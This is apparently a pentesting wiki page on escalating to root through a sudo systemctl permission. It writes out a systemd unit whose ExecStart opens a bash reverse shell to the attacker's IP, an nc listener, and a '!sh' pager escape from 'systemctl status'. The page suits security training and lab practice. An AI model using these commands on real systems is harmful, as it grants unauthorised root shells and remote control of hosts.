Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Sudo Systemctl Privilege Escalation

sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.

Modify Configurations

sudo -l

(ALL) NOPASSWD: systemctl
Copied!

If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.

1. Update the Config File

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!

Replace “<local-ip>” with your local ip address.

2. Start Listener in Local Machine

Then start listener for getting a root shell.

nc -lvnp 4444
Copied!

3. Restart the Service

Reload the daemon and restart.

sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!

Now we should get a shell in local machine.

Spawn Shell in the Pager

sudo -l

# output
(ALL) NOPASSWD: systemctl status example.service
Copied!

If we can execute systemctl status as root, we can spawn another shell in the pager. Just run the command with sudo.

sudo systemctl status example.service
Copied!

Then enter the following command in the pager like less.

!sh
Copied!

Spawning the shell, then we can get another user shell.

References

  • https://gtfobins.github.io/gtfobins/systemctl/

PreviousSudo Shutdown, Poweroff Privilege EscalationNextSudo Tee Privilege Escalation

Last updated 1 year ago

  • Modify Configurations
  • Spawn Shell in the Pager
  • References
Page cover image